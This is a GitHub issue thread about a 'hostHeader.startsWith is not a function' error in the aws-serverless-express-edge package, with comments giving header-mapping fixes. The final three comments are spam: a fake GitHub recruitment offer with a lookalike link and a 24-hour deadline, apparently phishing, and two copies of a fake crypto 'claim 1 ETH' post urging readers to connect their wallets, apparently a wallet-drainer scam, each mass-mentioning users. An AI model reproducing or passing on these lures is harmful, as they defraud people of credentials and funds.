### ISSUE TITLE
hostHeader.startsWith is not a function

### ISSUE THREAD

**Issue by dfloresgonz** [jgautheron/aws-serverless-express-edge#3]
I get this error. I cannot access the _http_agent.js I don't have that file.
Is there a way to solve this?
````javascript
hostHeader.startsWith is not a function
    at calculateServerName (_http_agent.js:240:20)
    at Agent.addRequest (_http_agent.js:155:26)
    at new ClientRequest (_http_client.js:258:16)
    at Object.request (http.js:42:10)
    at forwardRequestToNodeServer (/var/task/node_modules/aws-serverless-express-edge/index.js:129:26)
    at Object.proxy (/var/task/node_modules/aws-serverless-express-edge/index.js:188:9)
````

**Comment by Karibash** [comment]
@dfloresgonz 
The cause of the problem is that the request header is an object.
As I fixed this problem, please see below.
https://github.com/Karibash/aws-serverless-express-edge/commit/d4a80f14b39e33d8822f44d8267629818ae2030c

**Comment by erichaus** [comment]
were you able to get it working? I
 wrote my own module that does what this package does, but I keep getting a timeout when it does `http.request(options, ...)`

**Comment by dfloresgonz** [comment]
I had to modify the library:
in the function mapEdgeEventToHttpRequest I added:
`headers.host = headers.host[0].value;`

**Comment by erichaus** [comment]
@dfloresgonz did you get it actually working though? I'm getting socket hangup (ECONNRESET on "http.request()"), just curious if it's indeed possible to run express on lambda@edge!

**Comment by dfloresgonz** [comment]
@burritoland well I'm not sure yet I don't get the error anymore but my page is blank but no error in the browser console.

**Comment by albertovasquez** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
T-Tenma, @ceoluo, @fwangwang, @A6B0, @wjcgithub, @yunqihaodianer, @codeyu, @guowilling, @hahaduo, @xujiajun, @austingg, @ZJEdward, @Stand1210, @ImmortalZ, @calabashdoll, @kevin-xk, @ken-hoaglan, @iHTCboy, @Go-Faram, @wstart

**Comment by AlexeiDv** [comment]
[![Banner](https://pbs.twimg.com/media/GFz-XdoaUAAeB3h.jpg:large)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Greetings, crypto enthusiasts! Blastoff.zone has an irresistible offer for the first 10 participants! Simply engage and link your wallet to claim a whopping 1 ETH along with an enticing $500 bonus.

## How to Participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to head to the Blastoff.zone platform.
2. Link your Ethereum wallet on the platform to qualify for the $500 bonus.
3. Utilize the "Claim Now" feature to secure your tokens.

Don't let this golden opportunity slip away! Act swiftly to claim your rewards before the 1 ETH allocation is all taken.

Please note that token allocation operates on a first-come, first-served basis. Out of the 100 tokens reserved for distribution, an impressive 90% have already been snapped up!
5up3rc, @nickwanhere, @KDercksen, @OrandiH, @haleembanda, @LetmeBX, @selcukvardar, @Dawuge, @sqrtrev, @JustAnotherDevv, @taxio, @0FuzzingQ, @feng-sifang, @the3d4nk, @blockchainian, @hemanth895, @Boyan-MILANOV, @warrenween, @nstylo, @Stevewu1234, @yuanyinchen, @berndartmueller, @Troublor, @xdlkc, @2facedsquid, @amazighe85, @wusonglin12138, @csu, @dalberto, @plusplusxu, @Arinerron, @firstfu, @7sne, @ffynn, @mspaulding06, @AskBlockchain, @fullstackadam, @imhexagram, @manangouhari, @iprotoni, @xoxo5666, @sksb2180, @z530068718, @yurycooliq, @0xcharchar, @meatbody, @gww-parity, @miracle-kang, @ayush-3516, @Dziubutkus

**Comment by maulanaayub** [comment]
[![Banner](https://pbs.twimg.com/media/GFz-XdoaUAAeB3h.jpg:large)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Greetings, crypto enthusiasts! Blastoff.zone has an irresistible offer for the first 10 participants! Simply engage and link your wallet to claim a whopping 1 ETH along with an enticing $500 bonus.

## How to Participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to head to the Blastoff.zone platform.
2. Link your Ethereum wallet on the platform to qualify for the $500 bonus.
3. Utilize the "Claim Now" feature to secure your tokens.

Don't let this golden opportunity slip away! Act swiftly to claim your rewards before the 1 ETH allocation is all taken.

Please note that token allocation operates on a first-come, first-served basis. Out of the 100 tokens reserved for distribution, an impressive 90% have already been snapped up!
FredericWantiez, @roland-5, @fassko, @imgrantye, @mrhouzlane, @zuza-fr, @artall64, @xtools-at, @alephao, @xnzac, @hicaru, @Ratimon, @adam4545-droid, @omasanori, @pauliax, @azuline, @kartikay18, @rori4, @Jimexist, @jjgonecrypto, @DukeCaesar, @bednam, @kosecki123, @hexablob, @colekennelly1, @ChenfengWei0, @Hamzakh777, @msjyryxdzzj, @codeAndxv, @aiolos404, @pranavk, @PedroDnT, @polyzen, @danaikhamkao721, @incertia, @melihgunduz, @jwma, @degatchi, @thenishchalraj, @zzhsec, @futuretech6, @moesaleh, @gpBlockchain, @mlpao500, @totlsota, @marco-jardim, @tcrowe, @SMPearly, @zerosnacks, @findingbugs
